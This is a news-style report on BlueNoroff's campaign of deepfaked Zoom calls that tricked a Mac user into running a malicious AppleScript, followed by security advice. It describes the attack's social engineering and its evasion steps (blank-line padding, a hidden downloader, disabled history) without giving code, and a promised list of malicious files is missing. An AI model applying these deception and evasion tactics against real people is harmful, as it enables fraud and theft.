A group of hackers linked to North Korea, known as BlueNoroff, has taken its deception tactics to another level: they are posing as company executives during Zoom video calls. The goal? To trick employees into unknowingly installing malware designed specifically for Mac computers.
BlueNoroff (also called Sapphire Sleet or TA444) is a group of cybercriminals well known for their well-planned attacks, especially those targeting the cryptocurrency world. Over time, they have developed malware for both Windows and macOS, and are now using that expertise to launch more sophisticated attacks.
One of their most recent moves was detected on June 11, 2025, when a possible intrusion into a company's network was identified. Everything points to the target, once again, being to steal cryptocurrencies, a strategy they have already used in previous attacks and which coincides with reports from other security firms such as SentinelLabs, Microsoft, Jamf, and Kaspersky.
It all started when an employee at a tech company received a message on Telegram. The person who contacted him was posing as an external professional asking to schedule a meeting. Nothing out of the ordinary... at least at first.
The message included a Calendly link that, in theory, was for a Google Meet session. But when clicked, the link redirected to a page that looked like Zoom, but was actually a fake domain controlled by the attackers.
This technique is not new. Something similar had already been seen in April in a campaign attributed to a North Korean hacker group known as Elusive Comet.
When the employee connected to the supposed meeting, everything seemed legitimate. The video call included what appeared to be high-ranking executives from their own company (or at least very credible versions created with deepfakes) and also some “external participants” who reinforced the feeling that it was something serious and real.
But in the middle of the conversation, the employee had problems with his microphone, which was not working. The “executives” (also deepfakes) suggested that he download a Zoom extension to fix the technical glitch.
The link was sent directly to him via Telegram, leading him to download a file with an innocent name: zoom_sdk_support.scpt. What it actually contained was a malicious script in AppleScript, designed to compromise his Mac computer.
Malicious AppleScript script to fix microphone problems
Read more: Instagram Ads Use AI Deepfakes to Scam You
Once the victim runs the malicious file, everything seems normal at first. A legitimate Zoom SDK page opens, so as not to arouse suspicion. But what's really going on behind the scenes is much more worrying.
After silently analyzing thousands of blank lines (yes, more than 10,000), the script executes a hidden command that downloads another piece of malware from a fake website that mimics Zoom: support.us05webzoom.biz. From there, a second malicious payload is downloaded and executed on the victim's computer.
When researchers sprang into action to review the incident, the domain was no longer serving the file, but they managed to find a copy on VirusTotal that helped them understand how it all worked.
The first thing the script does is disable the command history so that no traces remain. It then checks whether the Mac has Rosetta 2 installed, a piece of software that allows apps designed for Intel processors to run on new Macs with Apple Silicon chips. If it is not installed, it automatically installs it, without asking for permission, so that it can run the rest of the malware without any problems.
Next, it creates a hidden file called .pwd (the dot at the beginning makes it invisible to the user) and downloads another part of the malicious code to a temporary system folder, named icloud_helper. And that's just the beginning.
Huntress researchers discovered at least eight different malicious files on the compromised computer. Some were small, but others were designed to take complete control of the system. Here are the most important ones:
This attack shows how sophisticated cybercriminals have become, especially groups like BlueNoroff, which not only create malware for Mac (still relatively rare), but now combine it with social engineering using deepfakes in video calls.
In addition, there is a false sense of security among many Mac users. It is often thought that Apple computers are “more secure” and that malware is a Windows thing. But that is changing fast.
With the growth of macOS use in corporate environments, hackers are adapting their attacks to this system. It is no longer just generic malware or petty theft. We are seeing well-planned campaigns, with complex tools targeting specific sectors, such as cryptocurrencies or technology companies.
No one is 100% safe, not even Mac users.
Be wary of any strange links or unusual requests, even if they appear to come from someone in authority.
Video calls do not guarantee that the person on the other end is real. With deepfakes, everything can be a well-staged performance.
Companies must educate their employees and keep their systems up to date and protected with the right tools to detect suspicious behavior, not just dangerous files.
While this attack may seem like something out of a movie, it is completely real. And what's most concerning is that these types of techniques are not going away... they are only going to become more common. Do you use Mac in your business or to manage cryptocurrencies? Now is the time to strengthen your security.